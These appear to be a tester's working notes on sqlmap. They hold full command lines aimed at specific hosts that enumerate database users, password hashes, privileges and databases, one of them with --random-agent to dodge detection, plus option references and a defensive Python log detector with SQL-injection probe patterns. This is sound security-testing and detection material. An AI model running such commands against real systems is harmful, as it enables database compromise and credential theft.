sqlmap
2023-09-11 14:14:18

https://github.com/sqlmapproject/sqlmap

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches including database fingerprinting, over data fetching from the database, accessing the underlying file system, and executing commands on the operating system via out-of-band connections.


http://sqlmap.org/

Test case

http://localhost:8086/project/controller/action (POST)

C:\Users\clu\Downloads\sqlmapproject-sqlmap-d4d83b2\sqlmap.py -u http://localhost:8086/project/controller/action --data="search=chuck&periodStatus=0&__RequestVerificationToken=AtQOR018kN6-nWlDQxFKI-9_-4Ni7JnZaNKTPMlbZFIzuK1Lz889_M0Wf5sYQ-H14fWTfUI0jJYFTYL30"

search=chuck&periodStatus=0&__RequestVerificationToken=AtQOR018kN6-nWlDQxFKI-9_-4Ni7JnZaNKTPMlbZFIzuK1Lz889_M0Wf5sYQ-H14fWTfUI0jJYFTYL30

Output directory: %userprofile%\AppData\Local\sqlmap\output\localhost


.\sqlmap.py -u "https://host:port/pentest5/Campaign/GetMyCampaignList" --data="search=cam&periodStatus=0&__RequestVerificationToken=Hgf410s-TtjOD2MoQFIQ7ebBFik__POnfJ3kbJjQ8CLK1XyS-d3GyY6gd_UHCkQs0cSTKfVks77VnBz00" --cookie="WebSession=4bpzpunlduq5z0cpzf5ysmnr; __RequestVerificationToken=h5owU63jNKlDzObOGxW4h7caJMJfDsBnxcN2U9Vj_iHQku9mkd-OY4GSgjG_YGzfnWLMYg2; _ga=GA1.2.2054830099.1592468707; _gid=GA1.2.1238954720.1592468707; EdenredAdminSite[...]denredParticipantSite[...]delay=0 --timeout=30 --retries=0 -p "search, periodStatus" --dbms="Microsoft SQL Server" --os=Windows --level=3 --risk=1 --threads=4 --time-sec=5 -b --current-user --current-db --hostname --is-dba --users --passwords --privileges --roles --dbs --batch --answers="crack=N,dict=N"


Option reference

https://github.com/sqlmapproject/sqlmap/wiki/Usage

-u URL, --url=URL   Target URL (e.g. "http://www.site.com/vuln.php?id=1")
--data=DATA         Data string to be sent through POST (e.g. "id=1")

--cookie=COOKIE     HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
--delay=DELAY       Delay in seconds between each HTTP request
--timeout=TIMEOUT   Seconds to wait before timeout connection (default 30)
--retries=RETRIES   Retries when the connection timeouts (default 3)
-p TESTPARAMETER    Testable parameter(s)

--dbms=DBMS         Force back-end DBMS to provided value
--os=OS             Force back-end DBMS operating system to provided value
--level=LEVEL       Level of tests to perform (1-5, default 1)
--risk=RISK         Risk of tests to perform (1-3, default 1)
--threads=THREADS   Max number of concurrent HTTP(s) requests (default 1)
--time-sec=TIMESEC  Seconds to delay the DBMS response (default 5)

Enumeration:
    These options can be used to enumerate the back-end database
    management system information, structure and data contained in the
    tables. Moreover you can run your own SQL statements

-b, --banner        Retrieve DBMS banner
--current-user      Retrieve DBMS current user
--current-db        Retrieve DBMS current database
--hostname          Retrieve DBMS server hostname
--is-dba            Detect if the DBMS current user is DBA
--users             Enumerate DBMS users
--passwords         Enumerate DBMS users password hashes
--privileges        Enumerate DBMS users privileges
--roles             Enumerate DBMS users roles
--dbs               Enumerate DBMS databases

General:
    These options can be used to set some general working parameters

--batch             Never ask for user input, use the default behavior
--answers=ANSWERS   Set predefined answers (e.g. "quit=N,follow=N")

python.exe .\sqlmap.py -u "url" -f --banner --dbs --users

you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'


How to include multiple parameters in sqlmap POST request

You can just comma-separate the parameters you want to test.

In a GET request:

$ sqlmap -u "http://example.com/?a=1&b=2&c=3" -p "a,b"

In a POST request:

$ sqlmap -u "http://example.com/" --data "a=1&b=2&c=3" -p "a,b" --method POST
...
[13:37:54] [WARNING] heuristic (basic) test shows that POST parameter 'a' might not be injectable
...
[13:37:59] [WARNING] heuristic (basic) test shows that POST parameter 'b' might not be injectable
...

Both examples would test the specified parameters a and b, but ignore c. (I also put them into double quotes which isn't actually necessary on Linux.)


Using sqlmap to exploit sql injection on ASP.NET and MSSQL 2012

Example

python sqlmap.py --url="http://172.16.192.177" --data="__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTE4MjI5ODQ3ODhkZBhYr%2F8jkYBFxsKYA1YM1vPkqv5P%2FQj8KLA89PfymMCs&__EVENTVALIDATION=%2FwEdAARI43w1YsdHPRRITZvRBlVuY3plgk0YBAefRz3MyBlTcInkg%2Fut7Je4AtoEsfzZAOI85pbWlDO2hADfoPXD%2F5tdeqsY63Vwtk2NY2Vz7Ib0nYv%2BCWGPoIG6fglzvAXHKcM%3D&txtUserName=adinanta&txtPWD=p%40ssw0rd&btnSubmit=Submit" -p txtUserName --banner


python.exe .\sqlmap.py -u "url" --data="__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJNTAyMzk4NTIwZGQ+200GJqzXan3bvSRe1830yMwO1/5WyLofSgkPPFPCDA==&__VIEWSTATEGENERATOR=AD8ECECA&__EVENTVALIDATION=/wEdAAMGQ3/2wHYEvc5SFKrtaUE7ESCFkFW/RuhzY1oLb/NUVM34O/GfAV4V4n0wgFZHr3cCneHHZYQNY/p/VeBR9o5AA9gjGBpbgF+4fPumKT6flA==&TextBox1=30&Button1=查询" --random-agent

[14:20:02] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS 
are you sure that you want to continue with further target testing? [Y/n]
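The WAF/IPS heuristic in the output above is the server-side view of the same traffic. As an added example (not from this page or the sqlmap project), the Python below shows the two cheapest server-side signals for spotting an automated injection scan in access logs: the default "sqlmap/..." User-Agent, which --random-agent suppresses, and a burst of injection-shaped query strings against one endpoint from one client. The log format, field layout and sample lines are constructed for this example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed, simplified log format: <ip> <method> <path[?query]> <status> "<user-agent>"
LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\d{3}) "([^"]*)"$')
# SQL fragments that routinely appear in automated probing (checked after URL-decoding).
PROBE_RE = re.compile(r"waitfor\s+delay|sleep\(|and\s+\d+=\d+|union\s+select|'\s*--", re.I)

# Constructed sample traffic: one scan with sqlmap's default User-Agent, one hiding
# behind a browser UA (as --random-agent does), and one ordinary visitor.
SAMPLE_LOG = """\
203.0.113.7 GET /article.php?id=1 200 "sqlmap/1.7.8#stable (https://sqlmap.org)"
198.51.100.9 GET /article.php?id=1%20AND%201=1 200 "Mozilla/5.0 (Windows NT 10.0)"
198.51.100.9 GET /article.php?id=1%20AND%201=2 200 "Mozilla/5.0 (Windows NT 10.0)"
198.51.100.9 GET /article.php?id=1%20UNION%20SELECT%20NULL 500 "Mozilla/5.0 (Windows NT 10.0)"
198.51.100.9 GET /article.php?id=1%20WAITFOR%20DELAY%20%270:0:5%27 200 "Mozilla/5.0 (Windows NT 10.0)"
198.51.100.9 GET /article.php?id=1%27-- 500 "Mozilla/5.0 (Windows NT 10.0)"
192.0.2.3 GET /article.php?id=42 200 "Mozilla/5.0 (X11; Linux x86_64)"
"""

def parse_line(line):
    """Return (ip, URL-decoded path, user-agent), or None for a line that does not fit."""
    m = LINE_RE.match(line.strip())
    return None if m is None else (m.group(1), unquote_plus(m.group(3)), m.group(5))

def analyze(lines, probe_threshold=5):
    """Map (client ip, endpoint) -> reasons for clients whose traffic looks like a scan.
    Only the query string is visible here; probes carried in a POST body (sqlmap --data)
    are only caught by application or WAF logs that record request bodies."""
    stats = defaultdict(lambda: {"requests": 0, "probes": 0, "sqlmap_ua": False})
    for ip, path, ua in filter(None, map(parse_line, lines)):
        entry = stats[(ip, path.split("?", 1)[0])]
        entry["requests"] += 1
        entry["sqlmap_ua"] |= "sqlmap" in ua.lower()
        entry["probes"] += bool(PROBE_RE.search(path))
    findings = {}
    for key, e in stats.items():
        reasons = ["default sqlmap User-Agent"] if e["sqlmap_ua"] else []
        if e["probes"] >= probe_threshold:
            reasons.append(f"{e['probes']} injection-like probes in {e['requests']} requests")
        if reasons:
            findings[key] = reasons
    return findings
```

Calling analyze(SAMPLE_LOG.splitlines()) flags both scanning clients and leaves the ordinary visitor alone; lowering probe_threshold trades false positives for earlier alerts.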